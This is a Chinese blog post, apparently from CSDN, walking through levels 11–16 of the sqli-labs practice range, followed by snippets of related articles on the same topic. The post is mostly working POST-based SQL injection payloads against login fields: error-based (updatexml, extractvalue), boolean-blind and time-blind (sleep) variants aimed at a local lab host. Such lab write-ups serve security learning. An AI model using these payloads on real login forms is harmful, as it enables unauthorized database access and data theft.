sqli-labs靶场通关(Less-11~16)

最新推荐文章于 2024-12-07 20:24:55 发布
最新推荐文章于 2024-12-07 20:24:55 发布
阅读量147 收藏
点赞数 1
分类专栏: sqli-labs靶场通关 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43381463/article/details/128783826
版权

typora-root-url: images

Less-11

  • 输入正常数据

    URL: http://192.168.12.129:81/sqli-labs/Less-11/
payload: uname=aa&passwd=a&submit=Submit

    image-20230113120952986

  • 尝试注入类型

    payload: uname=aa'&passwd=a&submit=Submit

    image-20230113121120554

    payload: uname=123&submit=Submit&passwd=aa' or sleep(0.3) or '

    image-20230113123356442

  • 使用时间型盲注

    # 获取长度
Post data: uname=123&submit=Submit&passwd=hfh' or if(length(database())=8,sleep(0.3),1) or '

# 获取数据库名
payload: Post data: uname=123&submit=Submit&passwd=hfh' or if(substr(database(),1,1)='s',sleep(0.3),1) or '

# 建议使用脚本爆破

  • 报错注入

    payload: uname=a' or extractvalue(1, concat(0x7e, database(), 0x7e)) or '&passwd=a&submit=Submit

    image-20230113124413220

Less-12

  • 尝试注入类型

    payload: uname=a") or sleep(3) or ("&passwd=a&submit=Submit

# 页面响应大概3左右显示,确定注入点

  • 报错注入

    payload: uname=a") or updatexml(1,concat(0x7e,database(),0x7e),1) or ("&passwd=a&submit=Submit

    image-20230113124413220

Less-13

  • 尝试注入类型

    payload: uname=a') or sleep(3) or ('&passwd=a&submit=Submit

# 页面响应大概3左右显示,确定注入点

  • 报错注入

    payload: uname=a') or updatexml(1,concat(0x7e,database(),0x7e),1) or ('&passwd=a&submit=Submit

    image-20230113124413220

Less-14

  • 尝试注入类型

    payload: uname=a" or sleep(3) or "&passwd=a&submit=Submit

# 页面响应大概3左右显示,确定注入点

  • 报错注入

    payload: uname=a" or updatexml(1,concat(0x7e,database(),0x7e),1) or "&passwd=a&submit=Submit

    image-20230113124413220

Less-15

  • 尝试注入类型

    payload: uname=a' or sleep(3) or '&passwd=a&submit=Submit

# 页面响应大概3左右显示,确定注入点

  • 布尔型盲注

    payload: uname=a' or length(database())=8 or '&passwd=a&submit=Submit

    image-20230120112821546

    # 确定数据库名长度为8

    payload: uname=a' or substr(database(),1,1)='s' or '&passwd=a&submit=Submit

    image-20230120112821546

    # 确定数据库第一个字符为's',后续可以使用脚本注入,确定数据库名

  • 时间型盲注

    payload: uname=a' or if(length(database())=8,sleep(3),1) or '&passwd=a&submit=Submit

# 确定数据库名长度为8

payload: uname=a' or if(substr(database(),1,1)='s',sleep(3),1) or '&passwd=a&submit=Submit

# 确定数据库第一个字符为's',后续可以使用脚本注入,确定数据库名

Less-16

  • 尝试注入类型

    payload: uname=a") or sleep(3) or ("&passwd=a&submit=Submit

# 页面响应大概3左右显示,确定注入点

  • 布尔型盲注

    payload: uname=a") or length(database())=8 or ("&passwd=a&submit=Submit

    image-20230120112821546

    # 确定数据库名长度为8

    payload: uname=a") or substr(database(),1,1)='s' or ("&passwd=a&submit=Submit

    image-20230120112821546

    # 确定数据库第一个字符为's',后续可以使用脚本注入,确定数据库名

  • 时间型盲注

    payload: uname=a") or if(length(database())=8,sleep(3),1) or ("&passwd=a&submit=Submit

# 确定数据库名长度为8

payload: uname=a") or if(substr(database(),1,1)='s',sleep(3),1) or ("&passwd=a&submit=Submit

# 确定数据库第一个字符为's',后续可以使用脚本注入,确定数据库名
sqli-lab靶场学习(四)——Less11-14(post方法)
sadoshi的专栏
09-20 514
第1-10关都是get方法,本关开始进入post方法。其实post也好get也好,本质都差不多,使用的技巧也基本相同。
sqli-labs靶场通关
最新发布
2401_87576048的博客
02-01 1192
mysql数据库5.0以上版本有一个自带的数据库叫做information_schema,该数据库下面有两个表一个是tables和columns。tables这个表的table_name字段下面是所有数据库存在的表名。table_schema字段下是所有表名对应的数据库名。columns这个表的colum_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库
sqli-lab(11)
qq_53030229的博客
05-03 774
文章目录一、判断注入点二、判断回显字段三、获取数据库四、获取数据表五、获取字段六、获取username、password 一、判断注入点 首先,我们使用burpsuit抓包,个人认为这样比较方便吧,你们也可以使用其他方式,基本过程都一样 二、判断回显字段 这里回显字段是有两个,看下图,如果回显字段为3时,响应显示报错,字段为2是则没有报错 三、获取数据库 uname=1234'union select 1,updatexml(1,concat(0x7e,(select database()),0x7e
sqli-labs关卡16(基于post提交的双引号加括号闭合的布尔盲注)通关思路
zyh1588的博客
11-11 959
小白回顾sql靶场16
SQL注入:sqli-labs靶场通关(第十一关)
l258282的博客
12-07 264
免责声明:工具本身并无好坏,希望大家以遵守《网络安全法》相关法律为前提来使用该工具,支持研究学习,切勿用于非法犯罪活动,对于恶意使用该工具造成的损失,和本人及开发者无关。
sqli-lab11和17关详解
cangyu51462的博客
04-26 1865
sqli-lab11和17关详解
sqli-labssqli-labs 靶场通关(1-16
m0_71944965的博客
09-02 666
🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场sqli-labs 靶场通关(1-16sqli-labs第一关 sqli-labs第一关 输入?id=1 正常 输入?id=1' 报错 输入?id=1'--+ 正常 判断有注入点且闭合方式是 ’ 使用and ‘1’='1判断他为字符型注入 ?id=1' order by 3--+ 正常 ?id=1' order by 4--+ 报错 判断回显位有三个。 id=0
Sqli-labs靶场11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1815
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场通关(1-20关)
2301_77977773的博客
07-03 1057
为了不影响 80 端口的服务,我们可以设置 Apache 服务的端口为82这是因为主机本身已经存在 MySQL 服务,我们可以不使用 php-study 配置中的 MySQL,就用主机本身即可,但版本可能需要注意,我这里使用的 5.7.351.安装sqli-labs-master到phpstudy_pro中的WWW/目录下2.修改phpstudy_pro\WWW\sqli-labs-master\sql-connections的db-creds.inc文件。
SqliLab_Mysql_Injection详解_字符型注入(十一)_宽字节注入(32~37)
qq_41260930的博客
11-01 1364
1. SqliLab_Mysql_Injection详解_字符型注入(十一) 1.1. SQL注入_宽字节注入 1.2. 原理 GBK编码规则:GBK编码,编码的范围为 8140-FEFE,首字节在 81-FE 之间,尾字节在 40-FE 之间,字符 \ 的ASCII码为5C,在其低位范围内,就可能被转换为一个服务器数据库不识别的汉字,并且能和它组合的字符不仅只有0xdf,%815c/%825c...
Sqli-lab注入靶场 11-20笔记
m0_59343440的博客
01-21 2701
Less-11POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)
综合开源靶场搭建
qq_53058639的博客
03-15 1533
没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。安装完成以后,登入到vulfocus平台,点击镜像管理->添加->勾选sqli-labs->点击一键导入,之后我们就可以在菜单栏首页,参看到sqli-labs靶场环境了。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
Sqlilab闯关记录(11~20)(白盒测试)
m0_56375711的博客
12-05 868
Sqlilab闯关记录(11~20)(白盒测试)
sqli-lab学习笔记(学习笔记)(11-20)
大方子
08-09 2514
接下来的关卡是post的注入,之前的都是GET型注入   所以需要准备这个: firfox+hackbar(firfox的插件)   自己常犯得错:   1.第15关length(database())我会下意识的加上select 变成length(select database()) 2.用变形双注入里面前面是用or连接,不是用union连接 3.17关的update(1,co...
Sqli-labs靶场16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 976
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
sqli-labs (less-11)
kukudeshuo的博客
03-09 3449
sqli-labs (less-11) 补充知识 从第11关开始我们发现跟以前的页面已经完全不一样了,这里要我们输入用户名和密码 假设我们现在注册了一个账号,账号为admin,密码为admin,我们登入进去看看 登入进去之后我们发现屏幕上回显了我们输入的账号和密码,但是url那里却没有返回我们输入的账号和密码,因为前面的关卡我们输入的内容都是以GET方式传输到了服务端,而这里我们输入的账号密码是以POST的方法传输到了服务端 GET请求和POST请求的区别 GET请求: GET方法用于获取请求页面的指定
sqli-labs 靶场 less-11~14 第十一关、第十二关、第十三关、第十四关详解:联合注入、错误注入
Superstacks超全栈
06-09 848
同时输入正确的用户名就可以查看到数据,那么我们就只可以在这个uname位置直接注入。如果是这样的话,那就只能通过错误信息来获取数据了,如下所示。但这样还不能获取数据,则判断这个注入方式为错误注入。然后经测试采用双引号加注释符就可以验证登录成功。正常输入结果显示成功,不过没有任何提示内容。同样通过这一个点获取数据库名和用户名。通过输入判断出查询字符串的闭合方式为。获取数前数据库的数据名和用户名。获取当前数据库所有的表名。获取user表所有的列名。获取当前数据库所有的表名。获取user表所有的列名。
sqlilab 11-17之看不懂的教程
跳房子的博客
01-19 816
第十一关:打开发现是一个登录页面,这时候我第一时间想到的是万能密码,通过尝试,username输入admin' or 1 -- #后成功登录,接着是order by查询字段数; 输入1‘ order by 3 登录后页面报错,说明有2个字段; 然后输入1' union select 1,2 #,判断出页面有两个显示位; 接下来就是爆数据库名,数据表名,字段名了; 爆数据库名:123' un...
sqli-labs第十一关
小人物的博客
06-10 4461
less11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入) 第十一关开始进入登录框这种模式,像登陆框这种模式也是可以当成sql语句注入的,你想想啊,它动态的页面,通过post传递值,然后再将post的值写到sql语句中,按照这个想法,那是不是万能注入也能使呢? 试一试。万能注入的语法为“ ‘or ‘1’ = ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值